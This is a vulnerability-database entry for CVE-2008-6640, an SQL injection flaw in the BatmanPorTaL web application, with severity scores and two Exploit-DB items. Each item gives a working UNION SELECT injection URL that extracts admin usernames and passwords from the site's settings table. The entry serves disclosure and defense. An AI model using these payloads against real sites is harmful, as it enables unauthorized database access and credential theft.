CVE-2008-6640
Published 2009-04-07
Priority P339 · high · 7.5 (CVSS 2.0)
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.4th percentile)
Multiple SQL injection vulnerabilities in BatmanPorTaL allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) uyeadmin.asp and (2) profil.asp. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
No detection rules found.
Exploit-DB
BatmanPorTaL - 'uyeadmin.asp?id' SQL Injection
exploitdb·2008-05-05
---
source: https://www.securityfocus.com/bid/29057/info
BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/lab/BatmanPorTaL/uyeadmin.asp?islem=uyeduzenle1&id=0+union+select+0,(admin_kd),2,1,(admin_pw),4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar
Exploit-DB
BatmanPorTaL - 'profil.asp?id' SQL Injection
exploitdb·2008-05-05
---
source: https://www.securityfocus.com/bid/29057/info
BatmanPorTaL is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/lab/BatmanPorTaL/profil.asp?id=1+union+select+0,admin_pw,admin_kd,3,4,5,6,7,8,9,1,1,1,1,1,1,1,1,1,1,1,1+from+ayarlar
No writeups or analysis indexed.